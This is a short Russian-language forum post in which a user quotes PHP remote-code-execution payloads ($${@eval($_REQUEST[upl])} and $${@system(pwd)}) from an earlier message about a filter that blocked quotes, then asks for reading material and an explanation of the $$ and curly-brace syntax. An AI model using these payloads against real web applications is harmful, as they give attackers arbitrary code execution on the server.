29.05.2015, 23:04
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Сообщение от None
с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Где можно про RCE в PHP почитать?Можеть есть какие то мануалы?
Сообщение от None
$${@eval($_REQUEST[upl])}
$${@system(pwd)}
Если не трудно - можете хотябы вкратце обьяснить почему такой синтаксис запроса?Где читать?Почему запрос начинается с $$ и скопки фигурные?
Если не сложно можно в кратце обьяснить что какой фрагмент кода делает?
[CODE]
|
|
|